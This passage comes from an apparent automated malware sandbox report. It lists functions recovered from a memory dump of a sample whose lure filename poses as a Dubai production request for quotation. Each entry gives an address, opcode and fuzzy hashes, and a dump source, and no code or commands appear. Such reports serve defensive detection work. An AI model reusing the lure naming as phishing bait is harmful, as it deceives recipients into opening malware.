Opcode Fuzzy Hash: b297edff4fc099a3bff32253cdeb6cd41bdfdb700582702b4d1b6533766a5312
Instruction Fuzzy Hash: F601D6362046019BD325CF7DDE18572FFE9FB99215704056DE509C3B28DB32E902C754

Function 015F821B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f7c3c332bec7e110b363ceaa7dd58ef4b2cb57a10975580bfe623a757478bb
Instruction ID: 6cb586da02111282ad29c766d7e6ffe20ceaec19e75e9036c15d11aa9b2a9f30
Opcode Fuzzy Hash: 79f7c3c332bec7e110b363ceaa7dd58ef4b2cb57a10975580bfe623a757478bb
Instruction Fuzzy Hash: D101AD36704549DFDB14EF6ADD05AAEB7FAFB81610F04446DEA01EB280DE20ED06C760

Function 016BF38A Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627d97e61db112425bba1eed931d7c2168b58e4dac1f1b9037a16c9b6168895d
Instruction ID: 9d1e8c8bcaac856fb4793024491ee42ef9da923cdba0662bcc00a290abcb6107
Opcode Fuzzy Hash: 627d97e61db112425bba1eed931d7c2168b58e4dac1f1b9037a16c9b6168895d
Instruction Fuzzy Hash: 36018F71A11218EBD710EFA9DC45FAEBBB8EF94704F14406AF901EB380DA74D901C7A4

Function 016024A2 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7c4c4314ca56c0223738376dbdf0bb73dd83bd67e5f5eb2c25e467532da01f
Instruction ID: 1fb3346b1edea65502a5a6166e519215fc8ed94966f03b561f3ecf73a788a6a2
Opcode Fuzzy Hash: 7d7c4c4314ca56c0223738376dbdf0bb73dd83bd67e5f5eb2c25e467532da01f
Instruction Fuzzy Hash: 8EF0F432A41A61ABC736DF5ACC54F47BEA9FFC4B60F15406CAA0697380D620DC01D7A0

Function 016D51B6 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6bb2097f447fb446127ec157f1d3982a3045ad3f39d5266a5897fa29b4e095
Instruction ID: a4aeb4942fb87d930c55efb39b70625937436366bfe3304fd237975e029a946a
Opcode Fuzzy Hash: ab6bb2097f447fb446127ec157f1d3982a3045ad3f39d5266a5897fa29b4e095
Instruction Fuzzy Hash: BC116D74D10259EFCB04DFA9D841A9EB7B4EF18704F14805EB915EB340E734DA02CB54

Function 016C92AB Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94

Function 016D50B7 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0d2347ee115ba20c88ffbede8cea55af032671f110c0d4e4cc13c1af9d0db6
Instruction ID: 495d75fb2b5be1a2b1db674c215be8ec747c4ac5c106a4f89fd7c0c6857adbf6
Opcode Fuzzy Hash: bf0d2347ee115ba20c88ffbede8cea55af032671f110c0d4e4cc13c1af9d0db6
Instruction Fuzzy Hash: 21111B70A0024ADFDB04DFA9D841BADFBF4BF08304F1442AAE519EB782E634D941CB94

Function 015FC2B0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction ID: 6ead63994effc93cda2caffdd9d68ce5e70709363b4625fc334ec056d6e7f55d
Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
Instruction Fuzzy Hash: D4F0F63724052B9BD3321AD98840F2FA9A6FFD6A60F16003DE74AFF640CA608C02D6D4

Function 016BF30A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1301315326e1c2696bbe349df64212c23a732a9f7a7d1e6e44f1981c7147ee35
Instruction ID: 3599536e21d50f023e24ecdb7aec0c8dcf173fd22edc49647cf63b0c3c8ea212
Opcode Fuzzy Hash: 1301315326e1c2696bbe349df64212c23a732a9f7a7d1e6e44f1981c7147ee35
Instruction Fuzzy Hash: 8B01EDB0E05609AFCB04DFA9D955A9EB7F4BF08704F104059B915E7351E674DA00CB94

Function 0168D4A0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37aa0544efedda858829e944b274b2fe7ede3b9810385995810723a537bcf76
Instruction ID: 5de6cb01c26f3a50ab25d53d7fe3b01bc2e3d22aa202ef3df8925cb233c8cb9e
Opcode Fuzzy Hash: e37aa0544efedda858829e944b274b2fe7ede3b9810385995810723a537bcf76
Instruction Fuzzy Hash: A6F0683268158167D7317BE98D54F2B3916FBE1A64F59042C77060B6D4DE54CD01C764

Function 016BF409 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea85962d6c289da3cbb0438d49920dd1624a6e06b1eef5d10d639d95c57f867
Instruction ID: 084845ed5a2893cd3dc479eccc42002bec3cdad828a7f6fa9d49338ed3f37e76
Opcode Fuzzy Hash: eea85962d6c289da3cbb0438d49920dd1624a6e06b1eef5d10d639d95c57f867
Instruction Fuzzy Hash: 43F0A432A11218ABD704EFB9DC55AEEB7B9EF44710F00809EF611EB290DA74D9018754

Function 0163716D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
Instruction ID: 26f8edaeb5796c75602da662fb3272d3c5fe644baceb02bddfd790a33c8b4e41
Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
Instruction Fuzzy Hash: ECF0C8B3E052569BEB15D7A88C40BAABFAA9BC0611F084469DE0297385DB30E940C6A4

Function 0168A130 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df5bc3629a3409696df6754ed6d7a1ab801e7ec8e920b8a413bb2aa59c137a7
Instruction ID: abc9ea55b04e2d6e1e26488ddc0765b9414e366b14e2ee82d0d065285fd96031
Opcode Fuzzy Hash: 9df5bc3629a3409696df6754ed6d7a1ab801e7ec8e920b8a413bb2aa59c137a7
Instruction Fuzzy Hash: 24018536110209ABDF12AE84DC40EDA3F66FB4C795F068216FE1866220C632E971EB80

Function 015FC090 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b909e9b4cdc262e5a058e652aee427a86407b5c98779361a04410d085f79e830
Instruction ID: 310eca8043b3ff22607ddfb57655f6d66d6c15620a609eb02df435221e54ce81
Opcode Fuzzy Hash: b909e9b4cdc262e5a058e652aee427a86407b5c98779361a04410d085f79e830
Instruction Fuzzy Hash: 21F0FA326442499EE328E60DCC00F2B76DAFB81711F24843EEB058F2D2EA729C038358

Function 0163648A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7385afe53fcd48e2eb93f417b985a281bca6e1599ae015a41ae4c0a1bfdbf4
Instruction ID: 5840349af70c336d003a920bfd24234c5aa154cd5e2c671c40667cd8364c68eb
Opcode Fuzzy Hash: 0f7385afe53fcd48e2eb93f417b985a281bca6e1599ae015a41ae4c0a1bfdbf4
Instruction Fuzzy Hash: 4B01A970741681ABF726A72CDD4CB2537EABB50B54F188194BA018B7D3DB68D9008214

Function 016D32C9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
Instruction ID: b256181d0d07b5a517bc14143916e113fa3d853754817b0c31cc7b9ab16fda59
Opcode Fuzzy Hash: 6204972ff3b380f720e05b2ecc519c88e41dbe2758d314eba0478bbef22976ee
Instruction Fuzzy Hash: F4F0C272900244BFE711EBA4CC41FEAB7FCEB04714F00052AB912D7280EA70EE40CBA4

Function 0168C51D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd0d7c2b8bc02c41877e9adedb922f64650cc03f910929c3531a818ffae7477
Instruction ID: 7906642689596f31feea7fe19b30b68766ab26a037c800aba5dac4e6127dbf11
Opcode Fuzzy Hash: 0dd0d7c2b8bc02c41877e9adedb922f64650cc03f910929c3531a818ffae7477
Instruction Fuzzy Hash: 5AF0A4702097049FC714EF28C841E1AB7E4EF58B14F40465EB998DB384E634E910C756

Function 016D5149 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41977547f35073e1affb940bfa51505b7e0ba48fde40be64ed57bab7bc07b8b1
Instruction ID: a59d5072072b10b71e24b8f2fa909a5c44e219e73f2aaccb862fb079e3055aa4
Opcode Fuzzy Hash: 41977547f35073e1affb940bfa51505b7e0ba48fde40be64ed57bab7bc07b8b1
Instruction Fuzzy Hash: 89F03C74A00209EFDB04EFB8DD45A9EBBF4EF18304F504459B915EB380E674DA00CB58

Function 015F92AF Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3295a8082ca862ecec4a101e1162b5c5294572f6ac2ee355085a61111a0fac9c
Instruction ID: 0835eeddffdb24dc3fdc7ff3a9147847988b37a04f91bfa435e246a7436cc55a
Opcode Fuzzy Hash: 3295a8082ca862ecec4a101e1162b5c5294572f6ac2ee355085a61111a0fac9c
Instruction Fuzzy Hash: 63F0F032200A006BD731DB09CC04F9ABBEDEF90718F08011DB64283591D6A0F909C650

Function 01630774 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction ID: 7114ea200c116534133aaf3097a18585a5671e12fb486a94d601745e9fa1ff82
Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction Fuzzy Hash: 65F0B472A10204AFE325DF25CC05B56B7F9EFE9710F148078A505D7260FAB1DD01C614

Function 0168C592 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7501049add361682db73df244fcd07002e3976714abf7f8e323bc18a0873e1c7
Instruction ID: 45cf9d84b935d76a45d7330222b23fd307d12fdca5e53be94c2e0cc1a8457b26
Opcode Fuzzy Hash: 7501049add361682db73df244fcd07002e3976714abf7f8e323bc18a0873e1c7
Instruction Fuzzy Hash: 02F06270A41209DFCB04EF69D915A9EB7B5EF18304F508069B915EB385DA74EA01CB64

Function 016BF247 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a82faab1655639ed0faab8eba09bafc03db8eb9eac66038a1a5734d2012d6d
Instruction ID: 3dcaa1f3e46e98adb758e6f3bf71132752978b4ea9ef3311384ad4908334b324
Opcode Fuzzy Hash: a5a82faab1655639ed0faab8eba09bafc03db8eb9eac66038a1a5734d2012d6d
Instruction Fuzzy Hash: 4BF04F71A00248EBDB04DFA9D845A9EB7F4AF18304F004099A901EB391D674D900CB58

Function 0160471B Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 345841b0730c8651bf7763bc637e53d754b65ae313e48c1ddd1a468aa871d0ed
Instruction ID: 3f43602d8847b72608aca73491434395caaf296fa61deeef612a25c649115617
Opcode Fuzzy Hash: 345841b0730c8651bf7763bc637e53d754b65ae313e48c1ddd1a468aa871d0ed
Instruction Fuzzy Hash: 00F024B1905690CFEB3B836CC844B737BC49B03260F0C886AC7298B6D2CBA4D884C250

Function 01642539 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction ID: 1e8049e003916526ed411ee720924eacb0adef904045836c2595d6fb26db889a
Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
Instruction Fuzzy Hash: D1E092327405412BE711AF599CE4F477B9E9FE2B10F14447DB9055F242CAE29D0982A4

Function 0163C50D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5752f3b8c0a44937ddbf7ab7c407233047c4c3b89e31b7cf7961e423ba3487b
Instruction ID: ecfc48c099736b8395e5e75f474d350a08613623b49bb1a92f700268572fc629
Opcode Fuzzy Hash: d5752f3b8c0a44937ddbf7ab7c407233047c4c3b89e31b7cf7961e423ba3487b
Instruction Fuzzy Hash: 50F0E2B15116909BE722936CCC48B217BD4AB81674F098167F50697792CB24D8A1C284

Function 01637128 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8794e57809054c136001c278c8d70914016d9538e3795a89297145e21e0c6ca1
Instruction ID: 5a55428282311e241f77471120f076c46deaf9bd358bc707d746f629a6faa10a
Opcode Fuzzy Hash: 8794e57809054c136001c278c8d70914016d9538e3795a89297145e21e0c6ca1
Instruction Fuzzy Hash: 07F0EC32D11A918FDB22D33EC848B22B7D8AB40A70F0D8064D81C87B02DB24DC80C291

Function 016D505B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 437d1fe111d577ac619b17da2497b1e19d0a543c2f6728f6f7c547fb71ce5e3d
Instruction ID: 5fb1ec391c78afb79d21bf9a569ff30e65c60f59cecdac4e1ac43d97759fada3
Opcode Fuzzy Hash: 437d1fe111d577ac619b17da2497b1e19d0a543c2f6728f6f7c547fb71ce5e3d
Instruction Fuzzy Hash: F6F08270A40249EBDB04EBB9DD56E5E77B9AF08704F54049CB502EB384EA74D900CB58

Function 016BF2AE Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e4e5ce24e020f9e94cf853e3b0b8ce6baf36359d5a8bf491e3398e9d31e2e4
Instruction ID: 3f3d703813bbfbcfff675b02a525fb2eba61576929095f3143f8d8b1b268fb13
Opcode Fuzzy Hash: 41e4e5ce24e020f9e94cf853e3b0b8ce6baf36359d5a8bf491e3398e9d31e2e4
Instruction Fuzzy Hash: C5F05871A10249EBDB04EBE9DC9AA9EB7B8AF08704F544098E602EB280DA74D941C718

Function 016BF717 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff0b990f4fb941da5a4687b76035f5ac71f73f1811595238b2d0f3066feebda
Instruction ID: ceebc7b6714146bc2b8a219bdb22b994125d0cf9a999f14b41cfc01412bdd656
Opcode Fuzzy Hash: 4ff0b990f4fb941da5a4687b76035f5ac71f73f1811595238b2d0f3066feebda
Instruction Fuzzy Hash: ACF08271A00248EBDB04DBA9DD56B9E77B8EF08704F5400ACF601EB390DA74D940C758

Function 016BF7CF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6478435dfe3c83ae3a83e9ae8423f34c85e531af6e285469510967c723d98a1
Instruction ID: c4bc8682c630d5e695fe14adb8fd49d2a946b0976f3aa1c4d51e3af2a4d935fd
Opcode Fuzzy Hash: b6478435dfe3c83ae3a83e9ae8423f34c85e531af6e285469510967c723d98a1
Instruction Fuzzy Hash: 62F08271A41248EBDB04DBB9DD56A9E77B8AF08704F54009CF502EB390DAB4D940C718

Function 0163174A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8bf560ca2c4dbbca09138fa43ea6f6c45970445fff6c342b9068c85662473e
Instruction ID: 48e9835434da082d571a349258d56f75af6857b29bcfde7b8e0ca7088feca145
Opcode Fuzzy Hash: cb8bf560ca2c4dbbca09138fa43ea6f6c45970445fff6c342b9068c85662473e
Instruction Fuzzy Hash: 27E09273A018216BD3616A58AC00F66B7AEEBE5A50F0E0439E904C7214D628DD02C7E4

Function 016354E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction ID: ad9f6579e24ce2206d3c6b0b8517608f651d9e28403abf396ba8c7f7e4a33b22
Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
Instruction Fuzzy Hash: 56E0E532141611ABC3211A0ADC00F12FBA9FB90771F148119E959432908760F801CAE4

Function 016D3336 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
Instruction ID: 8fd4bc1dec6616b9eaf8d408bbee8404165cd4572d63407639d1985e4584af5d
Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
Instruction Fuzzy Hash: 01E06DB2510640BBE765DB48DD01FA673ACFB10720F150258B115922D0DFB0FE40C664

Function 01602500 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fffc506824c943dfe85e3072f7fc1794198053a10acfef0df3cad4f2b53935bd
Instruction ID: 322aa3603a08de8f15a07326a37e6d7ccd41786d5a5943cc61a3c3f7bef92628
Opcode Fuzzy Hash: fffc506824c943dfe85e3072f7fc1794198053a10acfef0df3cad4f2b53935bd
Instruction Fuzzy Hash: 3CE092321005549BC326BB18DC11F9B779AEF60364F10412DF116571A0CB30A910C7D8

Function 015F81EB Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction ID: d62dc2b28d6002c4017716d774c190c5ce1cb54a44c04a74a84f3c5b26f76baf
Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
Instruction Fuzzy Hash: B6E0C231040515EFDB322B24EC00F5576E2FF50720F200A6EF9871A1A58BB4E8C1DA4C

Function 015FB502 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction ID: d7354e02d1152e47f2d03905ef2eb64264be4a2533073af3028ea84bba899981
Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction Fuzzy Hash: 70D05E32051611EAD7322F14ED09F967AB6BF90B10F09052DB2012A4F5A6A5ED88C695

Function 0167E588 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

